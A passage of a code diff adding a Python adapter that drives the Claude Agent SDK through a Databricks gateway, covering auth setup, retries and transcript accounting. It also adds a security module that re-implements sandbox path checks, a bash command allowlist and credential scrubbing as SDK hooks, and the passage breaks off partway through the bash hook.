+    CLI uses as ``ANTHROPIC_BASE_URL`` (the CLI appends ``/v1/messages``).
+
+    Derived from ``csharp_coverage/initial.py:_translate_endpoint`` (same
+    v1->v2 workspace rewrite, so the existing ``MODEL_ENDPOINT`` workflow
+    input keeps working as the sole source of the base URL), with two
+    DELIBERATE additions that the original does not have: (1) fail-closed —
+    return "" for empty or unrecognized input rather than a bogus relative
+    URL; (2) strip a trailing ``/v1/messages`` from an already-v2 base so the
+    CLI's own ``/v1/messages`` append doesn't double up. Not strict parity.
+    """
+    endpoint = endpoint.rstrip("/")
+    if not endpoint:
+        # Fail closed: an empty input must NOT produce a bogus relative
+        # '/serving-endpoints/anthropic' (which run_agent would then set as
+        # ANTHROPIC_BASE_URL and only discover as a confusing transport error).
+        return ""
+    if "/serving-endpoints/anthropic" in endpoint:
+        # Already a v2 base (possibly with a trailing /v1/messages the
+        # CLI would otherwise double-append) -- normalise to the base.
+        return endpoint.split("/v1/messages")[0]
+    if "/serving-endpoints/" not in endpoint:
+        # Can't locate the workspace prefix; fail closed rather than emit a
+        # malformed base URL.
+        return ""
+    workspace = endpoint.split("/serving-endpoints/")[0]
+    return f"{workspace}/serving-endpoints/anthropic"
+
+
+def configure_databricks_env(model: str, *, endpoint: str = "", token: str = "") -> None:
+    """Set the ``ANTHROPIC_*`` env vars the SDK's CLI reads to target the
+    Databricks Anthropic gateway.
+
+    * ``ANTHROPIC_BASE_URL``  <- ``translate_endpoint(endpoint)`` (falls
+      back to ``$MODEL_ENDPOINT`` when ``endpoint`` is empty).
+    * ``ANTHROPIC_AUTH_TOKEN`` <- ``token`` or ``$DATABRICKS_TOKEN``
+      (Bearer auth; NOT ``ANTHROPIC_API_KEY``).
+    * ``ANTHROPIC_MODEL``     <- ``model`` (sent in the request body).
+
+    WARNING: this mutates the PROCESS env, so the auth token becomes
+    visible to any subprocess the caller later spawns. ``run_agent`` does
+    NOT use this -- it scopes the ANTHROPIC_* vars to the SDK subprocess via
+    ``ClaudeAgentOptions(env=...)`` so the token never enters os.environ
+    (env_scrub invariant #5). This helper is retained for the standalone
+    smoke script (tools/sdk_smoke.py) and local one-shot use, where the
+    process is short-lived and spawns nothing else.
+    """
+    src_endpoint = endpoint or os.environ.get("MODEL_ENDPOINT", "")
+    if src_endpoint:
+        base_url = translate_endpoint(src_endpoint)
+        # Only set when translation produced a usable base; an unrecognized
+        # endpoint yields "" (fail-closed) and must NOT clobber a previously
+        # correct ANTHROPIC_BASE_URL with an empty value.
+        if base_url:
+            os.environ["ANTHROPIC_BASE_URL"] = base_url
+    auth = token or os.environ.get("DATABRICKS_TOKEN", "")
+    if auth:
+        os.environ["ANTHROPIC_AUTH_TOKEN"] = auth  # NOT ANTHROPIC_API_KEY
+    if model:
+        os.environ["ANTHROPIC_MODEL"] = model
+        # Map Claude Code's "opus" tier to the configured Databricks model so
+        # internal opus references resolve. (sonnet/haiku aliases can be added
+        # if the CLI's background tasks need them.)
+        os.environ.setdefault("ANTHROPIC_DEFAULT_OPUS_MODEL", model)
+    # Required so the gateway accepts the CLI's anthropic-beta flags (see
+    # DATABRICKS_CODING_AGENT_HEADER). Merge (don't setdefault) so a caller's
+    # pre-existing ANTHROPIC_CUSTOM_HEADERS can't drop our coding-agent header.
+    _merge_coding_agent_header(os.environ)  # type: ignore[arg-type]
+
+
+# ── Linear retry wrapper (OUR curve, not the SDK's) ───────────────────
+def _with_linear_retry(
+    fn: Callable[[], Any],
+    *,
+    max_retries: int = 3,
+) -> Any:
+    """Wrap a callable in the LINEAR backoff that ``agent_runner.post_message``
+    used. It is faithfully TWO curves, not one (this matches the original
+    verbatim; the floor on the 429 path is deliberate):
+
+      * 429:               min(max(60, 30*(attempt+1)), 120) -> 60, 60, 90, 120
+      * transient network: min(30*(attempt+1), 120)          -> 30, 60, 90, 120
+
+    The SDK owns its own (almost certainly exponential) backoff; this
+    wrapper sits *outside* it so the workflow-step timeout expectations
+    that were tuned to these curves survive the migration. 429s and
+    transport errors surfaced by the SDK are retried here; an
+    ``_HttpError`` with a non-429 code propagates immediately (the caller
+    turns it into the ``http_error_<code>`` stop_reason). NOTE: the SDK's
+    real transport-exception types are pinned by PR1's smoke probe; until
+    then the ``except`` below catches the broad transport base classes.
+
+    INTENTIONAL DIVERGENCE: ``agent_runner.post_message`` also honoured a
+    ``Retry-After`` header on 429s (within the 120s clamp). This wrapper sits
+    outside the SDK's HTTP request and never sees response headers, so it
+    cannot honour ``Retry-After`` — it always uses the linear curve above.
+    """
+    for attempt in range(max_retries + 1):
+        try:
+            return fn()
+        except _HttpError as e:
+            if e.code != 429 or attempt >= max_retries:
+                raise
+            wait = min(max(60, 30 * (attempt + 1)), 120)
+            print(
+                f"  HTTP 429; retrying in {wait}s "
+                f"(attempt {attempt + 1}/{max_retries})",
+                file=sys.stderr,
+            )
+            time.sleep(wait)
+        except (TimeoutError, OSError, ConnectionError) as e:
+            # Transient network failure (DNS, connection refused, socket
+            # timeout). 30/60/90->120s curve (no 60s floor -- this mirrors
+            # agent_runner's transient-network path, which differs from its
+            # 429 path on purpose). Re-raise when exhausted.
+            if attempt >= max_retries:
+                raise
+            wait = min(30 * (attempt + 1), 120)
+            print(
+                f"  Network error ({type(e).__name__}: {e}); retrying in "
+                f"{wait}s (attempt {attempt + 1}/{max_retries})",
+                file=sys.stderr,
+            )
+            time.sleep(wait)
+    raise RuntimeError("unreachable")
+
+
+def _classify_http_error(exc: BaseException) -> Optional[int]:
+    """Best-effort extraction of an HTTP status code from an SDK-surfaced
+    exception, so we can honour the ``http_error_<code>`` contract.
+
+    The SDK wraps transport errors in its own exception types; we probe
+    common attributes (``status_code``, ``code``, ``status``) and a
+    parenthetical ``(HTTP 429)`` / ``status 503`` substring in the
+    message. Returns None when no status can be inferred.
+    """
+    for attr in ("status_code", "code", "status", "http_status"):
+        val = getattr(exc, attr, None)
+        if isinstance(val, int) and 100 <= val <= 599:
+            return val
+    # Message fallback: ONLY match a 4xx/5xx that appears in an explicit
+    # HTTP-status context (e.g. "HTTP 429", "status: 503", "code=500").
+    # A bare ``\b([45]\d{2})\b`` would match incidental numbers ("after
+    # 500ms", "port 5000", "line 412") and mis-stamp arbitrary runtime
+    # errors as ``http_error_<code>`` -- which csharp_coverage/initial.py
+    # uses to skip the retrospective (invariant #12). PR1's smoke probe
+    # pins the SDK's real exception attrs; until then this stays strict so
+    # genuine programmer errors (TypeError/AttributeError from API drift)
+    # fall through and re-raise rather than being silently swallowed.
+    msg = str(exc)
+    m = re.search(r"(?:HTTP|status|code)[\s:=/]*([45]\d{2})\b", msg, re.IGNORECASE)
+    if m:
+        return int(m.group(1))
+    return None
+
+
+# ── Accumulation: rebuild AgentResult from the SDK message stream ─────
+# Per-value cap for the live trace. Deliberately high so reason/pattern/path/
+# command and most thinking render in full (the 60-char cap was too tight),
+# while a large edit_file body / full review payload is still bounded instead
+# of dumping unbounded content into CI logs on every turn.
+_TRACE_VALUE_CAP = 500
+
+
+def _truncate_trace_value(s: str, cap: int = _TRACE_VALUE_CAP) -> str:
+    """Cap a rendered trace value, appending an explicit ``…[+N chars]`` marker
+    so a truncation is never silent (you always see how much was dropped)."""
+    return s if len(s) <= cap else s[:cap] + f"…[+{len(s) - cap} chars]"
+
+
+def _format_tool_input(tool_input: dict[str, Any]) -> str:
+    """Render a tool_use input dict as a single trace line: ``key=value`` for
+    each arg. Values render in full up to ``_TRACE_VALUE_CAP`` (then a
+    ``…[+N chars]`` marker); newlines are flattened so each turn stays one
+    greppable log line; lists/dicts are rendered as compact JSON."""
+    parts: list[str] = []
+    for k, v in (tool_input or {}).items():
+        if isinstance(v, (list, tuple, dict)):
+            s = json.dumps(v, default=str)
+        else:
+            s = str(v)
+        parts.append(f"{k}={_truncate_trace_value(s.replace(chr(10), ' '))}")
+    return " ".join(parts)
+
+
+def _accumulate(result: AgentResult, msg: Any) -> None:
+    """Fold one SDK message into ``result``.
+
+    Mirrors ``agent_runner.run_agent``'s bookkeeping:
+      * each assistant turn increments ``turns`` and appends to
+        ``transcript``;
+      * the final assistant text becomes ``final_text``;
+      * ``touched_files`` is derived from ``Edit`` / ``Write`` / our
+        ``edit_file`` tool-use blocks;
+      * ``bash_invocations`` is derived from ``Bash`` / our ``bash``
+        tool-use blocks.
+
+    The SDK delivers structured content blocks, so the manual
+    ``content[*]["type"] == "tool_use"`` parsing is replaced by isinstance
+    checks against the SDK block classes. We import them lazily and fall
+    back to duck-typing on ``.__class__.__name__`` so this stays robust
+    across SDK versions and importable without the SDK.
+    """
+    cls = type(msg).__name__
+
+    if cls == "AssistantMessage":
+        result.turns += 1
+        blocks = getattr(msg, "content", []) or []
+        text_parts: list[str] = []
+        thinking_parts: list[str] = []
+        transcript_blocks: list[dict[str, Any]] = []
+        for block in blocks:
+            bname = type(block).__name__
+            if bname == "TextBlock":
+                txt = getattr(block, "text", "") or ""
+                text_parts.append(txt)
+                transcript_blocks.append({"type": "text", "text": txt})
+            elif bname in ("ThinkingBlock", "RedactedThinkingBlock"):
+                # Extended-thinking turns deliver a ThinkingBlock (no TextBlock,
+                # no ToolUseBlock). Capture the thinking text for the live trace
+                # so a thinking-only turn isn't a blank `(no tool)` line. NOT
+                # added to transcript_blocks — keep the transcript shape (and the
+                # retrospective/observer that read it) byte-for-byte unchanged.
+                think = (
+                    getattr(block, "thinking", "")
+                    or getattr(block, "text", "")
+                    or ""
+                )
+                if think:
+                    thinking_parts.append(think)
+            elif bname == "ToolUseBlock":
+                tool_name = getattr(block, "name", "") or ""
+                tool_input = getattr(block, "input", {}) or {}
+                # Preserve the block ``id`` so downstream consumers
+                # (retrospective compaction) can pair tool_use with the
+                # matching tool_result via id/tool_use_id, exactly as the
+                # agent_runner transcript did.
+                transcript_blocks.append(
+                    {
+                        "type": "tool_use",
+                        "id": getattr(block, "id", None),
+                        "name": tool_name,
+                        "input": tool_input,
+                    }
+                )
+                _record_tool_use(result, tool_name, tool_input)
+                # Live per-turn trace (shared by every bot/entrypoint that
+                # routes through run_agent). The agent loop is otherwise
+                # opaque between the pre-agent "gather" logs and the final
+                # result; this prints which tool each turn requested. GHA
+                # timestamps each log line, so a long gap before one line
+                # signals a stalled model call, while many lines in quick
+                # succession signal looping toward max_turns.
+                print(
+                    f"[agent] turn {result.turns}: tool={tool_name} "
+                    f"{_format_tool_input(tool_input)}",
+                    flush=True,
+                )
+                # Record EVERY tool name (not just edit/bash) so the reviewer's
+                # observer can report real tool usage (read_paths / grep /
+                # finalize_review) instead of a hardcoded "(none)".
+                if tool_name:
+                    result.tool_calls.append(tool_name)
+        if not any(b.get("type") == "tool_use" for b in transcript_blocks):
+            # No tool call this turn — still log it so every turn N is accounted
+            # for and a slow turn shows as a timestamp gap + a line, not silence.
+            # Prefer visible text; otherwise surface the extended-thinking
+            # content (what an otherwise-blank reasoning turn actually carries).
+            if text_parts:
+                _line = "(no tool) " + _truncate_trace_value(
+                    " ".join(text_parts).replace("\n", " ")
+                )
+            elif thinking_parts:
+                _line = "(thinking) " + _truncate_trace_value(
+                    " ".join(thinking_parts).replace("\n", " ")
+                )
+            else:
+                _line = "(no tool, no text)"
+            print(f"[agent] turn {result.turns}: {_line}", flush=True)
+        if text_parts:
+            # Last assistant text wins as final_text (matches the
+            # agent_runner contract: final turn's text completes the run).
+            result.final_text = "\n".join(text_parts)
+        result.transcript.append({"role": "assistant", "content": transcript_blocks})
+
+    elif cls == "UserMessage":
+        # tool_result turns come back as UserMessage with ToolResultBlocks.
+        result.transcript.append(
+            {"role": "user", "content": _summarize_tool_results(msg)}
+        )
+
+    elif cls == "ResultMessage":
+        # Terminal message: carries the SDK's stop reason + turn count (mapped
+        # onto our contract in run_agent), AND — when the caller set
+        # output_format=json_schema — the schema-validated `structured_output`
+        # dict. Capture it so a caller can read the canonical result without a
+        # terminator tool (Tier-2: reviewer finalize_review replacement). Absent
+        # / None when output_format was not requested, leaving Tier-1 untouched.
+        so = getattr(msg, "structured_output", None)
+        if so is not None:
+            result.structured_output = so
+        # Real usage + cost for the reviewer observer (replaces 0/0 placeholders).
+        # `usage` is the Anthropic usage shape; tolerate a dict or an attr object,
+        # and a missing field. Cost is the SDK's own rollup. Left at 0 when the
+        # gateway omits them.
+        usage = getattr(msg, "usage", None)
+        if usage is not None:
+            def _u(key: str) -> int:
+                v = usage.get(key) if isinstance(usage, dict) else getattr(usage, key, None)
+                return int(v) if isinstance(v, (int, float)) else 0
+            # prompt_tokens must reflect the FULL input the model processed, not
+            # just the uncached delta. With prompt caching the bulk of a large
+            # review prompt lands in cache_creation/cache_read, leaving
+            # input_tokens tiny (e.g. 3) — which falsely read as "the model saw
+            # almost nothing." Sum all three so the number answers "did the
+            # diff reach the model?".
+            result.prompt_tokens = (
+                _u("input_tokens")
+                + _u("cache_creation_input_tokens")
+                + _u("cache_read_input_tokens")
+            )
+            result.completion_tokens = _u("output_tokens")
+        cost = getattr(msg, "total_cost_usd", None)
+        if isinstance(cost, (int, float)):
+            result.total_cost_usd = float(cost)
+
+
+def _record_tool_use(result: AgentResult, name: str, tool_input: dict) -> None:
+    """Track touched_files / bash_invocations from a tool_use block.
+
+    Handles both the SDK built-in tool names (``Edit`` / ``Write`` /
+    ``Bash``) and our in-process ``@tool`` names (``edit_file`` /
+    ``bash``), since a given migration phase may use either surface.
+
+    SEMANTIC NOTE (differs from agent_runner): this fires at the model's
+    tool-*request* time (the ToolUseBlock on the AssistantMessage), BEFORE
+    execution. So ``bash_invocations`` records *attempted* commands -- it may
+    include a command that ``can_use_tool`` / the allowlist hook then denied,
+    and it carries no exit code / stdout / stderr (unlike agent_runner, which
+    captured post-execution). ``touched_files`` is unaffected in practice (an
+    Edit the hook denied never reaches the post-run gates because the working
+    tree is unchanged).
+
+    TODO(PR2): when ``csharp_coverage`` actually consumes ``bash_invocations``,
+    move this capture into a PostToolUse hook to record EXECUTED commands +
+    exit code/stdout/stderr (restoring the agent_runner contract + invariant
+    #14); the design doc §3.1 is reconciled there."""
+    # Normalize the MCP-qualified name (e.g. ``mcp__engineer-tools__edit_file``)
+    # down to its bare tool name so the in-process @tool surface is matched
+    # alongside the SDK built-ins. Without this, touched_files / bash_invocations
+    # stay EMPTY for the engineer @tool path — the write-scope gate reads
+    # touched_files, so a missed edit would slip past it. (Review)
+    name = name.rsplit("__", 1)[-1]
+    edit_like = {"Edit", "Write", "edit_file"}
+    bash_like = {"Bash", "bash"}
+    if name in edit_like:
+        path = (
+            tool_input.get("file_path")
+            or tool_input.get("path")
+            or ""
+        )
+        if path and path not in result.touched_files:
+            result.touched_files.append(path)
+    elif name in bash_like:
+        result.bash_invocations.append(
+            {"cmd": tool_input.get("command") or tool_input.get("cmd") or ""}
+        )
+
+
+def _stringify_content(content: Any) -> str:
+    """Coerce an SDK ToolResultBlock ``content`` to a string.
+
+    The agent_runner transcript stored tool_result ``content`` as a string
+    (the tool's JSON-encoded return). The SDK may hand back a non-string
+    (a list of content blocks, or a dict); downstream consumers treat a
+    non-string as an error/fallback path, so we normalise here.
+    """
+    if content is None:
+        return ""
+    if isinstance(content, str):
+        return content
+    try:
+        return json.dumps(content)
+    except (TypeError, ValueError):
+        return str(content)
+
+
+def _summarize_tool_results(msg: Any) -> list[dict[str, Any]]:
+    out: list[dict[str, Any]] = []
+    for block in getattr(msg, "content", []) or []:
+        if type(block).__name__ == "ToolResultBlock":
+            out.append(
+                {
+                    "type": "tool_result",
+                    "tool_use_id": getattr(block, "tool_use_id", None),
+                    "content": _stringify_content(getattr(block, "content", None)),
+                }
+            )
+    return out
+
+
+def run_agent(
+    *,
+    system: str,
+    prompt: str,
+    model: str,
+    cwd: str,
+    allowed_tools: list[str],
+    max_turns: int = 25,
+    endpoint: str = "",
+    token: str = "",
+    pre_tool_hooks: Optional[Any] = None,
+    can_use_tool: Optional[Callable[..., Awaitable[Any]]] = None,
+    mcp_servers: Optional[dict[str, Any]] = None,
+    env: Optional[dict[str, str]] = None,
+    output_format: Optional[dict[str, Any]] = None,
+) -> AgentResult:
+    """Drive the Claude Agent SDK and return an ``AgentResult``.
+
+    Drop-in replacement for ``agent_runner.run_agent`` /
+    ``reviewer_bot.agent.run_agent``: same return shape and ``stop_reason``
+    contract, the loop + transport delegated to the SDK.
+
+    Parameters
+    ----------
+    system, prompt:
+        System prompt + first user message.
+    model:
+        Model name (goes in the request body via ``ANTHROPIC_MODEL``).
+    cwd:
+        Working directory == the sandbox root (invariant #35: working-tree
+        isolation). The SDK runs tools relative to this.
+    allowed_tools:
+        Explicit allowlist (invariant #39: default-deny tool surface).
+        e.g. ``["mcp__engineer-tools__read_file", "Bash"]``.
+    max_turns:
+        Turn cap; maps to ``ClaudeAgentOptions(max_turns=...)`` and the
+        ``max_turns`` stop_reason.
+    pre_tool_hooks:
+        ``HookMatcher`` list / dict for PreToolUse / PostToolUse (the
+        bash allowlist + timeout clamp from ``sdk_security``).
+    can_use_tool:
+        Per-call permission callback (the safe_path + bash allowlist hard
+        deny from ``sdk_security``).
+    mcp_servers:
+        In-process ``@tool`` MCP servers (the truncation/exact-once tool
+        bodies reused from ``tools.py`` / reviewer ``sdk_tools.py``).
+    env:
+        Scrubbed environment (``sdk_security.scrubbed_env()``) -- the
+        ``env_scrub`` invariant (#5). Passed to ``ClaudeAgentOptions(env=)``
+        so spawned Bash subprocesses never see credential vars.
+
+    Raises
+    ------
+    RuntimeError:
+        If ``claude_agent_sdk`` is not installed (clear, late error).
+    """
+    if _SDK_IMPORT_ERROR is not None or ClaudeAgentOptions is None:
+        raise RuntimeError(
+            "claude_agent_sdk is not installed. Install it "
+            "(`pip install claude-agent-sdk`) and ensure the Claude Code "
+            "CLI is on PATH (`npm i -g @anthropic-ai/claude-code`). "
+            f"Original import error: {_SDK_IMPORT_ERROR!r}"
+        )
+
+    # Build the SDK subprocess env WITHOUT mutating the parent os.environ.
+    # ``env`` is the caller's scrubbed environment (sdk_security.scrubbed_env)
+    # -- no credential-shaped vars. We add the ANTHROPIC_* auth vars to a
+    # COPY that is handed to the SDK subprocess via ClaudeAgentOptions(env=)
+    # only, so the token never lands in the parent process environment where
+    # an unrelated subprocess the caller spawns could inherit it (env_scrub
+    # invariant #5). The standalone smoke script still uses the mutating
+    # configure_databricks_env() for convenience; run_agent does not.
+    #
+    # env=None default: scrub a COPY of os.environ rather than start from {}.
+    # The SDK spawns the Claude Code CLI (a Node binary) with this env, so it
+    # MUST retain PATH/HOME/NODE_PATH/etc. -- an empty base would leave the CLI
+    # unable to locate `node`/`claude`. Scrubbing os.environ keeps those while
+    # still stripping credential-shaped vars (invariant #5), so the safe path
+    # is also the default path.
+    agent_env = dict(env) if env is not None else env_scrub.scrub(dict(os.environ))
+    base_url = translate_endpoint(endpoint or os.environ.get("MODEL_ENDPOINT", ""))
+    if base_url:
+        agent_env["ANTHROPIC_BASE_URL"] = base_url
+    auth = token or os.environ.get("DATABRICKS_TOKEN", "")
+    if auth:
+        agent_env["ANTHROPIC_AUTH_TOKEN"] = auth  # NOT ANTHROPIC_API_KEY
+    if model:
+        agent_env["ANTHROPIC_MODEL"] = model
+        agent_env.setdefault("ANTHROPIC_DEFAULT_OPUS_MODEL", model)
+    # Opt into the gateway's coding-agent mode so it accepts the CLI's
+    # anthropic-beta flags (else: 400 "invalid beta flag"). Merge so a
+    # caller-supplied ANTHROPIC_CUSTOM_HEADERS can't drop our header.
+    _merge_coding_agent_header(agent_env)
+
+    opts = ClaudeAgentOptions(
+        system_prompt=system,
+        model=model,
+        max_turns=max_turns,
+        cwd=cwd,
+        allowed_tools=allowed_tools,  # explicit allowlist; default-deny
+        disallowed_tools=[],
+        permission_mode="acceptEdits",  # non-interactive; CI-safe
+        can_use_tool=can_use_tool,  # safe_path + bash allowlist (hard deny)
+        hooks=pre_tool_hooks,  # PreToolUse(Bash) allowlist + timeout clamp
+        mcp_servers=mcp_servers or {},  # in-process @tool servers
+        env=agent_env,  # scrubbed caller env + ANTHROPIC_* (subprocess-scoped)
+        setting_sources=[],  # do NOT inherit local settings / MCP (invariant #39)
+        # Tier-2 opt-in: a json_schema makes the SDK force a synthetic
+        # StructuredOutput tool and expose the validated dict on the terminal
+        # ResultMessage.structured_output (captured in _accumulate). None (the
+        # default) == no structured output, so Tier-1 callers are unchanged.
+        # Confirmed honoured by the Databricks gateway via tools/sdk_smoke.py.
+        output_format=output_format,
+    )
+
+    def _run_once() -> AgentResult:
+        # Build a FRESH AgentResult per attempt. _with_linear_retry re-runs
+        # this whole callable on a 429/transport error, so accumulating into
+        # a result constructed outside would double-count transcript entries,
+        # turns, and bash_invocations from the failed attempt (inflating the
+        # post-run-gate input for the write-scope check). The
+        # legacy agent_runner retried the single HTTP POST, never the loop,
+        # so it never hit this; rebuilding here restores that semantics.
+        res = AgentResult()
+        # Seed the transcript with the original user prompt so the shape
+        # matches agent_runner's [user, assistant, user(tool_results), ...]
+        # contract that existing transcript consumers expect.
+        res.transcript.append({"role": "user", "content": prompt})
+
+        async def _drive() -> None:
+            async with ClaudeSDKClient(options=opts) as client:
+                await client.query(prompt)
+                async for msg in client.receive_response():
+                    if type(msg).__name__ == "ResultMessage":
+                        _maybe_raise_http_error(msg)
+                    _accumulate(res, msg)
+
+        asyncio.run(_drive())
+        return res
+
+    try:
+        result = _with_linear_retry(_run_once)
+    except _HttpError as e:
+        return AgentResult(stop_reason=f"{HTTP_ERROR_STOP_PREFIX}{e.code}")
+    except Exception as e:  # noqa: BLE001 - map transport errors to the contract
+        code = _classify_http_error(e)
+        if code is not None:
+            return AgentResult(stop_reason=f"{HTTP_ERROR_STOP_PREFIX}{code}")
+        raise
+
+    result.stop_reason = "max_turns" if result.turns >= max_turns else "end_turn"
+    return result
+
+
+def _maybe_raise_http_error(result_msg: Any) -> None:
+    """Inspect a terminal ``ResultMessage`` for an error subtype and, if it
+    looks like a transport HTTP error, raise ``_HttpError`` so the
+    ``http_error_<code>`` contract is honoured.
+
+    The SDK reports a terminal error via ``is_error`` plus an
+    ``api_error_status`` int (confirmed present on ResultMessage by the PR1
+    smoke probe). We read that attribute FIRST; only if it's absent do we fall
+    back to scraping a 4xx/5xx code from the ``result``/``subtype`` text.
+    Non-HTTP errors fall through (the run ends with end_turn/max_turns).
+    """
+    if not getattr(result_msg, "is_error", False):
+        return
+    detail = str(getattr(result_msg, "result", "") or getattr(result_msg, "subtype", ""))
+    # Prefer the structured status the gateway surfaces over the text regex.
+    # Only 4xx/5xx are HTTP errors (we're already inside the is_error branch,
+    # but constrain the range so a stray 1xx/2xx can't mint an http_error stop).
+    status = getattr(result_msg, "api_error_status", None)
+    if isinstance(status, int) and 400 <= status <= 599:
+        raise _HttpError(status, detail)
+    code = _classify_http_error(Exception(detail))
+    if code is not None:
+        raise _HttpError(code, detail)
diff --git a/scripts/shared/sdk_security.py b/scripts/shared/sdk_security.py
new file mode 100644
index 000000000..64ddb85e4
--- /dev/null
+++ b/scripts/shared/sdk_security.py
@@ -0,0 +1,348 @@
+"""Security gates re-expressed as Claude Agent SDK hooks / callbacks.
+
+Every safety invariant the hand-rolled tool layer enforced
+(``scripts/engineer_bot/tools.py``, ``scripts/engineer_bot/env_scrub.py``)
+is preserved here -- moved behind SDK hooks (``HookMatcher`` /
+``PreToolUse``) and the per-call ``can_use_tool`` permission callback,
+rather than dropped.
+
+Mapping (see migration doc section 4):
+  * safe_path allowlist/denylist (tools.py:41-62)  -> ``make_safe_path_hook``
+    (PreToolUse, Read/Edit/Write/Glob) + ``make_can_use_tool`` (hard deny).
+  * bash argv allowlist + per-task timeout (tools.py:363-413)
+    -> ``make_bash_allowlist_hook`` (PreToolUse on Bash).
+  * env_scrub on subprocess exec (env_scrub.py:12-45)
+    -> ``scrubbed_env`` (ported regex table, byte-for-byte) fed to
+    ``ClaudeAgentOptions(env=...)``.
+
+The ``env_scrub`` regex table is reused VERBATIM: ``scrubbed_env`` delegates
+to ``env_scrub.scrub`` (a thin wrapper, so a future ``env_scrub`` deletion
+only needs the table relocated, not the call sites changed).
+
+The ``safe_path`` resolution semantics are re-expressed in ``_resolve_inside``
+as an EXACT MIRROR of ``tools.safe_path`` (tools.py:41-62) -- resolve() +
+is_relative_to(root) + denied-subpath check -- kept as an independent port
+(not an import) so the SDK hooks carry no hard dependency on a ``TaskConfig``
+instance. The semantics are identical and covered by unit tests; if
+``tools.safe_path`` ever changes, ``_resolve_inside`` must change with it.
+
+Imports of ``claude_agent_sdk`` are guarded so this module is importable
+(and unit-testable) without the SDK installed.
+"""
+from __future__ import annotations
+
+import shlex
+from pathlib import Path
+from typing import Any, Callable, Optional
+
+# Reuse the audited env-scrub table rather than re-deriving it.
+# ``shared.env_scrub.scrub`` carries the deliberate 12-regex table (and its
+# intentional avoidance of blanket ^DATABRICKS_/^AWS_ prefixes). The table now
+# lives in ``shared/`` (relocated in PR1), so this module has NO dependency on
+# ``engineer_bot``. The ``safe_path`` semantics are mirrored independently in
+# ``_resolve_inside`` below.
+from scripts.shared import env_scrub
+
+try:  # pragma: no cover - exercised only where the SDK is installed
+    from claude_agent_sdk import HookMatcher
+
+    _SDK_IMPORT_ERROR: Optional[Exception] = None
+except Exception as _exc:  # noqa: BLE001
+    HookMatcher = None  # type: ignore[assignment]
+    _SDK_IMPORT_ERROR = _exc
+
+
+# ── Path containment (invariants #1, #2, #9, #35) ─────────────────────
+# Tools whose inputs reference filesystem paths and therefore must be
+# containment-checked. Maps tool name -> the input keys that hold a path.
+_PATH_TOOLS: dict[str, tuple[str, ...]] = {
+    # SDK built-in tool names.
+    "Read": ("file_path", "path"),
+    "Edit": ("file_path", "path"),
+    "Write": ("file_path", "path"),
+    "Glob": ("path",),
+    "Grep": ("path",),
+    # Engineer in-process @tool names (matched after stripping the
+    # mcp__<server>__ prefix) so the path gate applies to that surface too.
+    "read_file": ("file_path", "path"),
+    "edit_file": ("file_path", "path"),
+    "grep": ("path",),
+    "glob": ("path",),
+}
+
+
+def _resolve_inside(
+    allowed_root: Path,
+    denied_subpaths: tuple[Path, ...],
+    rel: str,
+) -> Optional[Path]:
+    """Mirror of ``tools.safe_path`` (tools.py:41-62), kept independent so
+    the SDK hooks have no hard dependency on a ``TaskConfig`` instance.
+
+    Resolve ``rel`` against ``allowed_root``; return ``None`` if it escapes
+    the root OR lands inside any ``denied_subpaths`` entry. ``denied_subpaths``
+    entries may be files or directories (``is_relative_to`` is True for
+    equal paths, so a file entry denies exactly that file).
+    """
+    root = allowed_root.resolve()
+    resolved = (root / rel).resolve()
+    if not resolved.is_relative_to(root):
+        return None
+    for denied in denied_subpaths:
+        if resolved.is_relative_to(denied.resolve()):
+            return None
+    return resolved
+
+
+def _extract_tool_input(input_data: dict[str, Any]) -> dict[str, Any]:
+    """SDK hook payloads wrap the tool args under ``tool_input``; the
+    ``can_use_tool`` callback may pass them flat. Accept both shapes.
+    """
+    if isinstance(input_data.get("tool_input"), dict):
+        return input_data["tool_input"]
+    return input_data
+
+
+def _deny(reason: str) -> dict[str, Any]:
+    """SDK PreToolUse deny shape (permissionDecision='deny')."""
+    return {
+        "hookSpecificOutput": {
+            "hookEventName": "PreToolUse",
+            "permissionDecision": "deny",
+            "permissionDecisionReason": reason,
+        }
+    }
+
+
+def _allow_with_input(tool_input: dict[str, Any]) -> dict[str, Any]:
+    """SDK PreToolUse allow shape that also mutates the tool input
+    (used to clamp the Bash timeout)."""
+    return {
+        "hookSpecificOutput": {
+            "hookEventName": "PreToolUse",
+            "permissionDecision": "allow",
+        },
+        "tool_input": tool_input,
+    }
+
+
+def make_safe_path_hook(
+    allowed_root: Path,
+    denied_subpaths: tuple[Path, ...] = (),
+) -> Callable[..., Any]:
+    """Build a PreToolUse hook that DENIES Read/Edit/Write/Glob/Grep whose
+    resolved path escapes ``allowed_root`` or falls inside a denied subpath.
+
+    Re-expresses the ``safe_path`` gate (tools.py:41-62) that previously
+    lived inside each tool body. Registered via::
+
+        HookMatcher(matcher="Read|Edit|Write|Glob|Grep", hooks=[hook])
+
+    or per-tool matchers. Returns the SDK deny payload on violation; an
+    allow (empty dict) otherwise.
+    """
+
+    async def safe_path_hook(input_data, tool_use_id, context):  # noqa: ANN001
+        tool_name = input_data.get("tool_name", "")
+        keys = _PATH_TOOLS.get(tool_name)
+        if not keys:
+            return {}
+        ti = _extract_tool_input(input_data)
+        for key in keys:
+            rel = ti.get(key)
+            if rel is None:
+                continue
+            if _resolve_inside(allowed_root, denied_subpaths, str(rel)) is None:
+                return _deny(
+                    f"{tool_name}: path {rel!r} escapes the sandbox root "
+                    f"or is inside a denied subpath"
+                )
+        return {}
+
+    return safe_path_hook
+
+
+def make_bash_allowlist_hook(
+    allowlist: tuple[tuple[str, ...], ...],
+    timeout: int = 300,
+) -> Callable[..., Any]:
+    """Build a PreToolUse hook for Bash that DENIES any command whose argv
+    prefix is not in ``allowlist`` and clamps the per-call timeout.
+
+    Re-expresses the bash gate from ``tools.make_bash_tool`` (tools.py:
+    368-389): tokenize with ``shlex`` (shell=False semantics -> metachars
+    inert), prefix-tuple match against the allowlist (tools.py:376), and
+    set ``tool_input["timeout"]`` to the per-task cap (300s default, 900s for
+    csharp_coverage). The ``timeout`` argument here is SECONDS; we write it
+    back as a millisecond value (``timeout * 1000``) into the tool input field
+    literally named ``timeout`` — the ms unit is UNVERIFIED against the SDK
+    Bash tool until PR1's smoke probe (see the body comment).
+
+    Registered via ``HookMatcher(matcher="Bash", hooks=[hook])``.
+
+    NOTE: if the SDK's built-in Bash does not honour an injected timeout,
+    the fallback (per the migration doc) is a custom ``@tool bash`` that
+    runs ``subprocess.run(timeout=...)`` -- the argv allowlist check below
+    is identical either way.
+    """
+
+    async def bash_hook(input_data, tool_use_id, context):  # noqa: ANN001
+        if input_data.get("tool_name", "") not in ("Bash", "bash"):
